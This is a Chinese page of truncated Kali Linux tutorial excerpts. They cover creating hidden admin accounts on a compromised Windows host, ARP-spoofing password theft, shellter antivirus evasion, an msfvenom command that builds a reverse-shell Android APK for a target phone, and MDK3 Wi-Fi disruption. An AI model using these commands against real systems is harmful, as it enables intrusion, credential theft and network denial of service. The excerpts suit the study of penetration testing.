Kali Linux

网络安全工程师演示:原来我的计算机可以这样被为所欲为!

时间秒杀一切 提交于 2020-10-02 00:01:53
一、课前准备 使用kali工具***Windows目标计算机并获取目标计算机的管理员权限。 二、课程目标 1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。 2.通过学习本课程,达到充分利用kali工具所获取信息提高后续***测试效率的目标。 三、课程内容 1.远程查看目标计算机的系统信息。 命令:C:\Windows\system32>systeminfo 回车 命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001) 2.在目标计算机中远程创建隐藏账户。 命令:C:\Windows\system32>net user 用户名$ 密码 /add 回车 例子:C:\Windows\system32>net user admin$ 123456 /add 命令行结果显示界面: 附加知识:①加$,创建账户为隐藏账户;不加$,创建账户为普通账户。(通过加$符号创建的隐藏账户只是无法通过 net user 命令查看,但仍能通过图形界面查看。如需创建真正隐藏账户,需要进行注册表相关操作,后续课程将为大家详细介绍。) ②在目标计算机中查看通过加$符号创建的隐藏账户。 查看步骤:目标计算机->控制面板->用户账户和家庭安全->用户账户->管理账户 3.远程删除目标计算机中已存在的账号。 命令:C:\Windows

网络安全工程师教你:如何使用Kali Linux进行Metasploit******?【初探】

天大地大妈咪最大 提交于 2020-09-29 05:37:21
Metasploit***测试框架基础(一) 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?接下来让我们一起学习! 二、资源装备 1.安装好Kali Linux的虚拟机一台; 2.整装待发的小白一个。 三、战略安排 3.1 在Kali Linux中利用图形化界面启动Metasploit(msf)框架,推荐小白使用,如下图所示。 步骤:在搜索框检索msf,选择metasploit framework点击进行入。 3.2 成功利用图形化界面启动metasploit(msf)***框架,如下图所示可得metasploit***框架的版本信息。 3.3 利用密令行模式启动metasploit(msf)***框架,如下图所示。 命令:msfconsole 3.4 metasploit(msf)***框架正在启动中,如下图所示。 3.5 metasploit(msf)***框架启动成功,如下图所示。 3.6 利用help命令获取metasploit(msf)***框架的操作命令,如下图所示。 命令:help 3.7

网络安全工程师与白帽子***教你Kali Linux***:内网***实战技巧

核能气质少年 提交于 2020-09-27 12:11:34
课前声明: 本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络***干货! 下篇文章将在明天下午五点发布,敬请关注! 本节课你将了解到如何使用ARP欺骗窃取局域网用户相关账户密码,内容包括: 如何开启IP转发 怎样窃取受害用户相关账号密码 一、如何开启IP转发 在之前的截取受害者电脑图片流量的课程中,我们也讲过了要开启IP转发以及如何开启,开启IP转发使受害者电脑能够正常联网,不至于打草惊蛇,方便我们后续的***,这里我们在重述一下如何开启IP转发。 在kali机终端中输入cat /proc/sys/net/ipv4/ip_forward,查看ip_forward的值,cat命令是Linux中用于连接文件并打印到标准输出设备上,该命令的意思是将/proc/sys/net/ipv4目录下的ip_forward的值打印出来,若该值为0,表示关闭ip转发,若为1,则表示开启ip转发。我们要做就是将该值改为1,继续在终端中输入echo 1 > /proc/sys/net/ipv4/ip_forward,echo命令也可用作打印,这里加上了“>”重定向符号,意思将1重定向到ip_forward中,即就是将ip_forward的值改为1,更多Linux命令详解,请持续关注Kali与编程推出的相关章节。 使用这种方式进行的赋值只是暂时的,重启过后将无效

网络安全工程师教你:如何设置以Root用户权限登录Kali Linux系统?

早过忘川 提交于 2020-09-24 09:07:35
一、背景介绍 对于在Kali中有使用中文输入的小伙伴来说,大家在安装好Kali2020.2后发现Kali2020.2不像以前的版本的Kali版本,Kali2020.2默认不是以root管理员身份运行的,所以需要我们发挥动手能力,学会在Kali2020.2中完美以root权限执行。 二、武器装备 安装好Kali2020.2的虚拟机一台; 整装待发的小白一个。 三、战略安排 3.1 看你的Kali2020.2是否处于root模式,如下图所示。 $为普通用户 #为root模式 3.2 重启Kali进而配置单用户模式,如下图所示。 命令:sudo reboot 输入Kali的密码 3.3 重启进入如下图所示的页面后,进行单用户的设置,如下图所示。 步骤:在如下图所示的页面按住字母e键,进入如下图所示的页面进行配置。 3.4 更改配置文件,如下图所示。 步骤:在linux这一行,将ro改为rw,在splash后空一格,添加命令:init=/bin/bash,如下图所示。 3.5 配置完上图的页面后,按住f10进入以下单用户页面,如下图所示,回车继续。 3.6 如下图所示,系统进入单用户的命令行模式 3.7 更改root(管理员用户)用户密码,如下图所示。 命令:passwd root New password: Retype new password: 3.8

No.101-HackTheBox-Linux-Sneaky-Walkthrough渗透学习

邮差的信 提交于 2020-08-13 18:31:58
** HackTheBox-Linux-Sneaky-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/19 靶机难度:中级(5.0/10) 靶机发布日期:2017年10月29日 靶机描述: Sneaky, while not requiring many steps to complete, can be difficult for some users. It explores enumeration through SNMP and has a beginner level buffer overflow vulnerability which can be leveraged for privilege escalation. 作者: 大余 时间:2020-05-16 请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 一、信息收集 可以看到靶机的IP是10.10.10.20… Nmap扫描仅发现开放了Apache和SNMP两个服务… 80端口上没什么可用的信息…直接枚举爆破看看… 枚举发现了dev目录… dev目录提供了此页面

kali 免杀工具shellter安装以及使用

回眸只為那壹抹淺笑 提交于 2020-08-13 06:22:59
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀 官网: https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话 就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件 开始安装: 1. apt-get update //更新一下 2. apt-get install shellter //直接apt在线安装 安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令 dpkg --add-architecture i386 && apt-get update && apt-get install wine32 确认安装即可 现在我们打开shellter就可以打开运行了,工具安装完成后再 /usr/share/windows-resources/shellter 这个文件夹 shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。 免杀实验: Choose Operation

KALI 之 Msf 控制 Android手机

心不动则不痛 提交于 2020-08-12 02:41:23
中华人民共和国网络安全法 警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk -设置监听端主机lhost=192.168.xx.xxx -设置监听端主机端口lhost=5555 -保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk 自动生成了一个10179 bytes 大小的程序 3.把hugboyMsf.apk安装到目标手机并运行 1).如何让虚拟机与主机数据分享,进而发送到手机上安装? 安装VMtools直接拖到本地桌面 Apt update Apt install open-vm-tools-desktop fuse Reboot 重启生效 2).发送到手机安装,忽略警告,点击继续。。。 4.打开metasploit工具 5.设置payload use exploit/multi/handler set payload android/meterpreter/reverse

关于kali linux的安装方式

让人想犯罪 __ 提交于 2020-08-11 02:41:35
一、制作kali系统的GHOST文件 步骤1:用win32-disk-p_w_picpath把ISO文件刻到U盘上,引导启动后剩余的空间是不可写的(此时的U盘如同光盘)。 步骤2:用ghost来备份U盘 选 Local→Partition→To Image 菜单,弹出硬盘选择窗口,开始分区备份操作。备份文件命令为kali.gho。是否压缩备份数据时可以选择NO(No 表示不压缩,Fast表示压缩比例小而执行备份速度较快,High 就是压缩比例高但执行备份速度相当慢)。 二、用diskgeius给U盘分区 分成三个区,且都是主分区,第一个区格式化成FAT32(此分区将来还是你的U盘);第二个区要分600M以上,用来储存在kali live persistence里面安装的或修改的东西;第三个分区大小要比你ghost备份下来的文件稍微大一点(此分区没必要太大否则浪费)。 三、用ghost把备份下来的文件还原到第三个分区 四、用bootice修改U盘 步骤1:用bootice修改U盘的主引导记录成grub4dos。 步骤2:下载本文附件中的grldr_menu.rar,解压后将其中文件拷贝在第一个分区根下。 五、配置kali Persistence功能 步骤1:进入 bios设置U盘启动,保存并启动电脑 步骤2:在启动选择画面中,选第一个“Kali linux(686-pae)”。

Wi-Fi 真的安全吗?一行代码就可让周边无线网络全部瘫痪!| 原力计划

邮差的信 提交于 2020-08-09 23:48:00
作者 | 哈密瓜味咸鱼 来源 | CSDN博客 在如今 Wi - Fi已经是我们每个人日常生活中都必不可少的东西,但是在 Wi-Fi 如此大范围的普及之下, Wi-Fi 真的安全吗? 答案是否定的。我们利用kali Linux系统中的插件MDK3可以轻而易举的就可以使周围的 Wi-Fi 全部瘫痪! 本文所有测试均经过同意,请勿用于非法用途,未经作者授权禁止转载!!! 了解什么是MDK3 MDK3是一款在很早之前已经出现的一款无线网络测试工具,攻击模式多种多样,个人认为其中最残忍最有效的攻击手段便是MDK3的断网攻击,发起攻击之后,所有已连接 Wi-Fi 的客户端全部掉线,并且当客户端重新连接 Wi-Fi 的时候,即使输入正确的密码, Wi-Fi 也会显示密码错误,从而达到瘫痪效果。 什么是kali Linux Kali Linux是一个高级渗透测试和安全审计Linux发行版。 如果你听到一个 13 岁的“黑客”吹嘘他是多么的牛逼,是有可能的,因为有 Kali Linux 的存在。尽管有可能会被称为“脚本小子”,但是事实上,Kali 仍旧是安全专家手头的重要工具。相信大名鼎鼎的 Kali 大家都有了解,由于篇幅问题这里就不进行过多介绍了。 由于篇幅问题大家可以自行搜索如何在电脑中安装kali linux系统,非常的简单。 准备工作 1.笔记本电脑(需安装kali linux系统) 2